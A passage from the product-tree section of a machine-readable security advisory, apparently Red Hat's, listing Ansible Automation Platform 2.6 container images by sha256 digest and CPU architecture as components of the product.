"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
